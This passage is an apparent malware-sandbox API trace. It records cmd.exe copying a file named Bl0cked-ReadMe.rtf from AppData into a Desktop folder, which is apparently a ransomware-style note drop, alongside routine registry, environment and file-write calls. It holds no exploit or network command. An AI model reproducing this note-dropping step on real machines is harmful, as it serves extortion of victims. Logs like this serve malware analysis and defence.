lpBuffer=0x26f704*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.173] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f704, dwLength=0x1c | out: lpBuffer=0x26f704*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.173] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f704, dwLength=0x1c | out: lpBuffer=0x26f704*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.173] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f704, dwLength=0x1c | out: lpBuffer=0x26f704*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0220.173] GetConsoleOutputCP () returned 0x1b5 [0220.175] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.175] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.175] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.175] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.177] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.177] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.178] GetEnvironmentStringsW () returned 0x320178* [0220.178] FreeEnvironmentStringsW (penv=0x320178) returned 1 [0220.178] GetEnvironmentStringsW () returned 0x320178* [0220.178] FreeEnvironmentStringsW (penv=0x320178) returned 1 [0220.178] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6a4 | out: phkResult=0x26e6a4*=0x40) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0xa0, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x1, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x1, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x0, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x40, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x40, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x40, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegCloseKey (hKey=0x40) returned 0x0 [0220.179] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6a4 | out: phkResult=0x26e6a4*=0x40) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x40, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x1, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x1, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x0, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x9, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x4, lpData=0x26e6b0*=0x9, lpcbData=0x26e6a8*=0x4) returned 0x0 [0220.179] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6ac, lpData=0x26e6b0, lpcbData=0x26e6a8*=0x1000 | out: lpType=0x26e6ac*=0x0, lpData=0x26e6b0*=0x9, lpcbData=0x26e6a8*=0x1000) returned 0x2 [0220.179] RegCloseKey (hKey=0x40) returned 0x0 [0220.179] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.179] srand (_Seed=0x5b8863b6) [0220.179] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" [0220.179] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" [0220.179] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.180] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.180] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.180] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.180] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.180] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.180] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.180] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.180] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.180] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.180] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.180] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.180] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.180] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.181] GetEnvironmentStringsW () returned 0x3222c8* [0220.181] FreeEnvironmentStringsW (penv=0x3222c8) returned 1 [0220.181] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.181] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.181] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.181] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.181] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.181] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.181] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.181] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.181] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.181] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.181] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f470 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.181] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f470, lpFilePart=0x26f46c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f46c*="Desktop") returned 0x18 [0220.181] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.181] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f1ec | out: lpFindFileData=0x26f1ec) returned 0x320008 [0220.181] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0220.182] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f1ec | out: lpFindFileData=0x26f1ec) returned 0x320008 [0220.182] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0220.182] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f1ec | out: lpFindFileData=0x26f1ec) returned 0x320008 [0220.182] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0220.182] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.182] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.182] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.182] GetEnvironmentStringsW () returned 0x322ae8* [0220.182] FreeEnvironmentStringsW (penv=0x322ae8) returned 1 [0220.182] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.183] GetConsoleOutputCP () returned 0x1b5 [0220.194] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.194] GetUserDefaultLCID () returned 0x409 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f5b0, cchData=128 | out: lpLCData="0") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f5b0, cchData=128 | out: lpLCData="0") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f5b0, cchData=128 | out: lpLCData="1") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.195] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.196] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.197] GetConsoleTitleW (in: lpConsoleTitle=0x3108d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.201] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.201] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.202] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.202] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.202] _wcsicmp (_String1="type", _String2=")") returned 75 [0220.203] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0220.203] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0220.203] _wcsicmp (_String1="IF", _String2="type") returned -11 [0220.203] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0220.203] _wcsicmp (_String1="REM", _String2="type") returned -2 [0220.203] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0220.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.207] GetFileType (hFile=0x7) returned 0x2 [0220.216] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.216] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f4a8 | out: lpMode=0x26f4a8) returned 1 [0220.220] _dup (_FileHandle=1) returned 3 [0220.220] _close (_FileHandle=1) returned 0 [0220.220] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0220.220] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f478, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0220.221] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0220.221] GetConsoleTitleW (in: lpConsoleTitle=0x26f2a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.222] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0220.222] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0220.222] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0220.222] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0220.222] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.222] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x26ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ee0c) returned 0x310e60 [0220.223] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0220.223] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0220.223] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0220.223] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26dd18, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0220.223] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0220.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.223] GetFileType (hFile=0x54) returned 0x1 [0220.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.223] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26dd70 | out: lpFileSizeHigh=0x26dd70*=0x0) returned 0x1632 [0220.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.223] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.223] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.223] GetFileType (hFile=0x4c) returned 0x1 [0220.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.223] GetFileType (hFile=0x4c) returned 0x1 [0220.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.224] GetFileType (hFile=0x4c) returned 0x1 [0220.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.225] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.225] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.225] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.226] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.226] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.226] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, 